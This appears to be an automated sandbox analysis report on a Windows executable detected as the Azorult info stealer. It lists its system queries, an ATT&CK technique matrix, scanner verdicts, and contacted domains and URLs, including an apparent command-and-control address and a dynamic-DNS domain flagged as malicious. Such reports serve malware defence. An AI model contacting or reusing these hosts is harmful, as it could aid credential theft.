              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_004065CC GetUserNameW,6_2_004065CC
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,6_2_00404C15
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected AzorultShow sources
              Source: Yara matchFile source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e0YQRfcpqS.exe PID: 4740, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e0YQRfcpqS.exe PID: 6564, type: MEMORY
              Source: Yara matchFile source: 6.2.e0YQRfcpqS.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.e0YQRfcpqS.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Yara detected Azorult Info StealerShow sources
              Source: Yara matchFile source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e0YQRfcpqS.exe PID: 4740, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e0YQRfcpqS.exe PID: 6564, type: MEMORY
              Source: Yara matchFile source: 6.2.e0YQRfcpqS.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.e0YQRfcpqS.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: Process Memory Space: e0YQRfcpqS.exe PID: 4740, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e0YQRfcpqS.exe PID: 6564, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsNative API1Application Shimming1Process Injection11Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsApplication Shimming1Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsTimestomp1DCSyncSystem Information Discovery24Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              e0YQRfcpqS.exe10%ReversingLabsByteCode-MSIL.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              6.2.e0YQRfcpqS.exe.400000.0.unpack100%AviraHEUR/AGEN.1108750Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.manutd.com40%Avira URL Cloudsafe
              https://dotbit.me/a/0%URL Reputationsafe
              https://dotbit.me/a/0%URL Reputationsafe
              https://dotbit.me/a/0%URL Reputationsafe
              https://uk.tigerwit.com/about/liverpool0%Avira URL Cloudsafe
              http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
              http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
              http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
              http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
              http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
              http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
              https://tribus-watches.com/0%Avira URL Cloudsafe
              http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
              http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
              http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              http://crl4.digicert-0%Avira URL Cloudsafe
              http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
              http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
              http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
              https://www.tiktok.com/0%Avira URL Cloudsafe
              http://www.mancity.com40%Avira URL Cloudsafe
              http://o.ss2.us/00%URL Reputationsafe
              http://o.ss2.us/00%URL Reputationsafe
              http://o.ss2.us/00%URL Reputationsafe
              http://195.245.112.115/index.php0%Avira URL Cloudsafe
              http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
              http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
              http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
              https://sdk.privacy-center.org/loader.js0%Avira URL Cloudsafe
              http://www.liverpoolfc.com40%Avira URL Cloudsafe
              http://0k10dk21kkeok2e.online40%Avira URL Cloudsafe
              http://s.ss2.us/r.crl00%URL Reputationsafe
              http://s.ss2.us/r.crl00%URL Reputationsafe
              http://s.ss2.us/r.crl00%URL Reputationsafe
              http://crl3.digicert.c0%Avira URL Cloudsafe
              https://www.liverpoolfc.comH0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              0k10dk21kkeok2e.online
              		172.67.179.188
              		truefalse
                		unknown
                chelseafc.map.fastly.net
                		151.101.2.133
                		truefalse
                  		unknown
                  d2hhwit6pbhmvu.cloudfront.net
                  		99.86.159.34
                  		truefalse
                    		high
                    www.realmadrid.com
                    		unknown
                    		unknownfalse
                      		high
                      www.manutd.com
                      		unknown
                      		unknownfalse
                        		high
                        www.liverpoolfc.com
                        		unknown
                        		unknownfalse
                          		high
                          www.mancity.com
                          		unknown
                          		unknownfalse
                            		high
                            www.chelseafc.com
                            		unknown
                            		unknownfalse
                              		high
                              aca1cab2451.duckdns.org
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.liverpoolfc.com/false
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://secure.widget.cloud.opta.net/v3/v3.opta-widgets.jse0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.mancity.com/base/e0YQRfcpqS.exefalse
                                      		high
                                      http://www.manutd.com4e0YQRfcpqS.exe, 00000000.00000002.272813491.0000000003396000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/74/thumb_73386_partnerlogo_pe0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                        		high
                                        https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/08/7abcb0d130016504c4a4761aee0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.manutd.com/e0YQRfcpqS.exefalse
                                            		high
                                            http://www.realmadrid.com/base/uIJBEuhZwHfuEruqtWZLYlYmKZhrCgYNpCevGEPixchHNslePakqGiwLoUJiSfYvRcRmYe0YQRfcpqS.exe, 00000000.00000002.272749215.0000000003361000.00000004.00000001.sdmpfalse
                                              		high
                                              https://dotbit.me/a/e0YQRfcpqS.exefalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.mitel.com/learn/case-studies/liverpool-football-clube0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                		high
                                                https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/11/thumb_110194_partnerlogo_e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://uk.tigerwit.com/about/liverpoole0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.mancity.com/base/uIJBEuhZwHfuEruqtWZLYlYmKZhrCgYNpCevGEPixchHNslePakqGiwLoUJiSfYvRcRmYpue0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmp, e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.liverpoolfc.com/history/heysele0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/08/a645dcf8e1f1cf28fb38a0701e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://www.acronis.com/en-gb/e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://faq.liverpoolfc.com/portal/homee0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108623_partnerlogo_e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.realmadrid.come0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmp, e0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107697_partnerlogo_e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://ocsp.rootg2.amazontrust.com08e0YQRfcpqS.exe, 00000000.00000002.279005900.00000000063FD000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.liverpoolfc.com/my-lfc/join/user-details?user_type=freee0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://www.levi.com/GB/en_GB/e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.chelseafc.com/-http://www.manutd.com/9http://www.mancity.com/base/e0YQRfcpqS.exefalse
                                                                        		high
                                                                        http://www.liverpoolfc.come0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/92/thumb_91232_partnerlogo_pe0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://www.youtube.com/realmadride0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://crl.sca1b.amazontrust.com/sca1b.crl0e0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://www.realmadrid.come0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/16/thumb_15152_partnerlogo_pe0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.standardchartered.com/home/en/index.html?camp_id=liverpool_source=liverpoolfctv_medium=4e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namee0YQRfcpqS.exe, 00000000.00000002.272749215.0000000003361000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/41/thumb_40979_partnerlogo_pe0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://www.snapchat.com/e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/aa0024fde91a556201a3e18ace0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/73/thumb_72810_partnerlogo_pe0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://tribus-watches.com/e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.liverpoolfc.com/legal/privacy-policye0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112227_partnerlogo_e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://ocsp.sca1b.amazontrust.com06e0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://www.liverpoolfc.com/legal/terms-and-conditionse0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0e0YQRfcpqS.exe, 00000000.00000002.279005900.00000000063FD000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://www.liverpoolfc.com/history/hillsboroughe0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://ocsp.rootca1.amazontrust.com0:e0YQRfcpqS.exe, 00000000.00000002.279005900.00000000063FD000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://crl4.digicert-e0YQRfcpqS.exe, 00000000.00000002.279005900.00000000063FD000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		low
                                                                                                      https://store.liverpoolfc.com/customer/account/login/e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.realmadrid.com/base/uIJBEuhZwHfuEruqtWZLYlYmKZhrCgYNpCevGEPixchHNslePakqGiwLoUJiSfYvRcRme0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmp, e0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.twitter.com/realmadride0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.axa.com/?utm_source=liverpoolfc&amp;utm_medium=logo-partnership&amp;utm_campaign=lfc1819e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/caba13e5118c92cd18eab74b2e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.chelseafc.come0YQRfcpqS.exe, 00000000.00000002.272813491.0000000003396000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.liverpoolfc.com/ticketse0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://crl.rootg2.amazontrust.com/rootg2.crl0e0YQRfcpqS.exe, 00000000.00000002.279005900.00000000063FD000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108617_partnerlogo_e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/f9d2bf533c57965e0174bf510e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.tiktok.com/e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.mancity.com4e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://o.ss2.us/0e0YQRfcpqS.exe, 00000000.00000002.279005900.00000000063FD000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://www.liverpoolfc.com/accessible/accessiblee0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://schema.org/Organizatione0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107008_partnerlogo_e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.mancity.come0YQRfcpqS.exe, 00000000.00000002.272867530.00000000033CD000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.manutd.com/en/Partners/Global/Visit-Maltae0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.nike.com/gb/e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://195.245.112.115/index.phpe0YQRfcpqS.exe, 00000006.00000003.272126711.00000000026E0000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://www.liverpoolfc.com/membershipe0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.verbier.ch/en/index.htm?reset=1e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.liverpoolfc.com/legal/cookiese0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/scripts.min.jse0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112272_partnerlogo_e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.manutd.com/en/Help/Accessibilitye0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.tourism-mauritius.mue0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.youtube.com/manutde0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.liverpoolfc.com/corporate/rss-feedse0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/18/thumb_117132_partnerlogo_e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://crt.rootg2.amazontrust.com/rootg2.cer0=e0YQRfcpqS.exe, 00000000.00000002.279005900.00000000063FD000.00000004.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://ip-api.com/jsone0YQRfcpqS.exefalse
                                                                                                                                                          		high
                                                                                                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/home-scripts.min.jse0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.liverpoolfc.com/corporate/anti-slaverye0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://www.realmadrid.com/fre0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://instagram.com/manchesterunitede0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://sdk.privacy-center.org/loader.jse0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://www.manutd.com/en/partners/global/swissquotee0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.manutd.com/en/Help/Privacy-Policye0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.manutd.com/en/partners/global/marriott-hotelse0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://www.liverpoolfc.com4e0YQRfcpqS.exe, 00000000.00000002.272867530.00000000033CD000.00000004.00000001.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.mancity.com/base/uIJBEuhZwHfuEruqtWZLYlYmKZhrCgYNpCevGEPixchHNslePakqGiwLoUJiSfYvRcRmYpuVe0YQRfcpqS.exe, 00000000.00000002.272749215.0000000003361000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://pubads.g.doubleclick.net/gampad/ads?sz=640x480&iu=/e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://uk.joiebaby.com/liverpoolfc/e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://www.liverpoolfc.com/corporate/browser-supporte0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://www.realmadrid.com/ene0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/74/thumb_73714_partnerlogo_pe0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://www.liverpoolfc.com/contactuse0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://0k10dk21kkeok2e.online4e0YQRfcpqS.exe, 00000000.00000002.272867530.00000000033CD000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/78/thumb_77004_partnerlogo_pe0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://s.ss2.us/r.crl0e0YQRfcpqS.exe, 00000000.00000002.279005900.00000000063FD000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/92/thumb_91236_partnerlogo_pe0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          		high
